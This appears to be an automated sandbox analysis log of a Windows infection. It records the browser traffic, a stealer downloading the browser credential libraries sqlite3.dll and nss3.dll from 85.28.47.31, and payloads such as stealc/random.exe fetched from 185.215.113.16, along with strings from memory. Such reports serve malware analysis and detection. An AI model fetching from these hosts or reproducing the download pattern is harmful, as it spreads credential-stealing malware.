Source: global traffic	HTTP traffic detected: GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.2045.47"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I76l5PHSkuJEfmntRfpXyKF9d2CZ3ZVNDVHTO0EGAn7_bo5ZGw98nP2MHND84A-DOFk_AEPt&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1609852158%3A1722009468052145&ddm=0 HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentX-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:30FkMdE4fITVSBT8E9RkpB9l4CNviA:kopkWy9Y50s-TwhG
Source: global traffic	HTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_GB.N1bNysriJnk.es5.O/am=BB2MYXQbgUA8nAM9QCkQMgAAAAAAAAAAaAMAAJgB/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlHu1g2JNWjQ7Rsj1KTg1Ll6LPidEQ/m=_b,_tp HTTP/1.1Host: www.gstatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.2045.47"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1722614268&P2=404&P3=2&P4=aDBJmBRiu4bBgG0d5CtBgiCyasWY4s3e85vX9uilaJ5ZoJGUCP2ypk%2bTuDQrDjSoZ5e0N2ocgIZWMEShUpNIng%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: 1nTulnp8J4hLpQqiZr1rmMSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /_/bscframe HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:30FkMdE4fITVSBT8E9RkpB9l4CNviA:kopkWy9Y50s-TwhG
Source: global traffic	HTTP traffic detected: GET /generate_204?2GXXiw HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:k7ycyzf5oH0xzIm_cMmIR9UG3Nc5ww:4KY7uW5rvtbqXLom
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:k7ycyzf5oH0xzIm_cMmIR9UG3Nc5ww:4KY7uW5rvtbqXLom
Source: global traffic	HTTP traffic detected: GET /v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb HTTP/1.1Host: location.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v3/signin/_/AccountsSignInUi/gen204/?tmambps=0.00006616961789375582&rtembps=-1&rttms=82&ct=undefined HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=516=eLtuQCG4EKOUiy_WkIWBEoarZIHSwG7qGlWLFpSQnVFe8D_MZ9msw9JLMJwj8x708HeKW6qgHSTPUcFjpzJ8ZYyqvyV3spkA26VZGF4EVJPCbE-E1tXgy8VtJWXjgpQJTmQfV6E2tDYD3sQA5CvGeAKYlXOoJRi2UpDnhZW-H8M
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/enter.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/PharmaciesDetection.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /inc/buildred.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/build2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache

Source: firefox.exe, 00000028.00000002.2895347761.0000026191E5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "://connect.facebook.net//sdk.js""://.imgur.io/js/vendor..bundle.js""://auth.9c9media.ca/auth/main.js""https://smartblock.firefox.etp/play.svg""://static.adsafeprotected.com/iasPET.1.js""://adservex.media.net/videoAds.js""://.moatads.com//moatapi.js""://static.chartbeat.com/js/chartbeat.js""://connect.facebook.net//all.js""://.moatads.com//moatheader.js""://www.rva311.com/static/js/main..chunk.js""://cdn.optimizely.com/public/.js""://.vidible.tv//vidible-min.js""://www.google-analytics.com/gtm/js""://c.amazon-adsystem.com/aax2/apstag.js""://www.googletagservices.com/tag/js/gpt.js""://www.google-analytics.com/analytics.js""://imasdk.googleapis.com/js/sdkloader/ima3.js""://cdn.adsafeprotected.com/iasPET.1.js""://www.googletagmanager.com/gtm.js""://libs.coremetrics.com/eluminate.js""://js.maxmind.com/js/apis/geoip2//geoip2.js""://s.webtrends.com/js/advancedLinkTracking.js""://static.chartbeat.com/js/chartbeat_video.js""://.imgur.com/js/vendor..bundle.js""://s0.2mdn.net/instream/html5/ima3.js""://www.google-analytics.com/plugins/ua/ec.js""://www.everestjs.net/static/st.v3.js""://cdn.branch.io/branch-latest.min.js""://ssl.google-analytics.com/ga.js""://pub.doubleverify.com/signals/pub.js""://static.criteo.net/js/ld/publishertag.js""://.adsafeprotected.com/jload?""://s.webtrends.com/js/webtrends.js""://track.adform.net/Serving/TrackPoint/""://pubads.g.doubleclick.net/gampad/ad""://.adsafeprotected.com/.js""https://ads.stickyadstv.com/firefox-etp""://.adsafeprotected.com//Serving/""://pubads.g.doubleclick.net/gampad/ad-blk""://.adsafeprotected.com/jsvid?""://.adsafeprotected.com/tpl?""://s.webtrends.com/js/webtrends.min.js""://pixel.advertising.com/firefox-etp""://pubads.g.doubleclick.net/gampad/ad-blk""://vast.adsafeprotected.com/vast""://securepubads.g.doubleclick.net/gampad/ad""://vast.adsafeprotected.com/vast""://www.facebook.com/platform/impression.php""://pubads.g.doubleclick.net/gampad/ad""://securepubads.g.doubleclick.net/gampad/ad""://.adsafeprotected.com/.png""://ads.stickyadstv.com/auto-user-sync""://pixel.advertising.com/firefox-etp""://.adsafeprotected.com//imp/""://.adsafeprotected.com//unit/""://ads.stickyadstv.com/user-matching""://.adsafeprotected.com/.gif""://.adsafeprotected.com/jsvid""://.adsafeprotected.com/services/pub""://track.adform.net/Serving/TrackPoint/""://www.facebook.com/platform/impression.php""://.adsafeprotected.com/jload""://.adsafeprotected.com//adj""://.adsafeprotected.com//adj""://.adsafeprotected.com/.gif""://ads.stickyadstv.com/auto-user-sync""https://ads.stickyadstv.com/firefox-etp""://.adsafeprotected.com/.png""://.adsafeprotected.com//unit/""://ads.stickyadstv.com/user-matching""://.adsafeprotected.com//Serving/""://.adsafeprotected.com/jload""://.adsafeprotected.com/jload?""://.adsafeprotected.com/.js""://.adsafeprotected.com/jsvid""*://
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "://pagead2.googlesyndication.com/gpt/pubads_impl_.js""https://www.amazon.com/exec/obidos/external-search/""://securepubads.g.doubleclick.net/gpt/pubads_impl_.js""://id.rambler.ru/rambler-id-helper/auth_events.js""://media.richrelevance.com/rrserver/js/1.2/p13n.js"FTP support was removed from Firefox in bug 1574475Please use $(ref:SecurityInfo.overridableErrorCategory)."://pagead2.googlesyndication.com/tag/js/gpt.js"An unexpected property was found in the WebExtension manifest."://track.adform.net/serving/scripts/trackpoint/" equals www.rambler.ru (Rambler)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "://www.facebook.com/platform/impression.php" equals www.facebook.com (Facebook)
Source: buildred.exe, 0000001A.00000002.2956306224.000000000854C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"_ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.2761056031.0000025949DA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2878694022.0000026181C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]qN"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]qN"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountt-]q equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]qQ"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]qQ"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"t-]q equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]qxID: 5652, Name: firefox.exe, CommandLine: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]qxID: 7092, Name: firefox.exe, CommandLine: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]q{ID: 7440, Name: firefox.exe, CommandLine: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2719579662.000001E53ADCB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2766918700.000001E53ADCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: '98p8https://www.youtube.com/account --attempting-deelevationUser equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://web-assets.toggl.com/app/assets/scripts/.jswebcompat-reporter%40mozilla.org:1.5.1://connect.facebook.net//sdk.jsresource://gre/modules/FileUtils.sys.mjs://www.rva311.com/static/js/main..chunk.js://connect.facebook.net//all.js://static.chartbeat.com/js/chartbeat.js://cdn.branch.io/branch-latest.min.js://www.googletagmanager.com/gtm.js://www.google-analytics.com/plugins/ua/ec.js://ssl.google-analytics.com/ga.js@mozilla.org/addons/addon-manager-startup;1://www.google-analytics.com/analytics.jsresource://gre/modules/addons/XPIProvider.jsm://s0.2mdn.net/instream/html5/ima3.js://libs.coremetrics.com/eluminate.js://imasdk.googleapis.com/js/sdkloader/ima3.js://.imgur.com/js/vendor..bundle.js://www.google-analytics.com/gtm/js://www.googletagservices.com/tag/js/gpt.js://.imgur.io/js/vendor..bundle.jsFileUtils_closeSafeFileOutputStream://c.amazon-adsystem.com/aax2/apstag.jshttps://smartblock.firefox.etp/play.svg://static.chartbeat.com/js/chartbeat_video.js://track.adform.net/serving/scripts/trackpoint/https://smartblock.firefox.etp/facebook.svg://www.everestjs.net/static/st.v3.js*://pub.doubleverify.com/signals/pub.jsFileUtils_closeAtomicFileOutputStream://auth.9c9media.ca/auth/main.js://static.criteo.net/js/ld/publishertag.jsFX_SESSION_RESTORE_ALL_FILES_CORRUPT equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2878323682.0000026181BB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -os-restarted https://www.youtube.com/accountH equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2927921411.0000026194B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2919430058.0000026193B3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2919430058.0000026193BAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2922894584.0000026194761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000003.2751223783.00000261842EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842EC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files 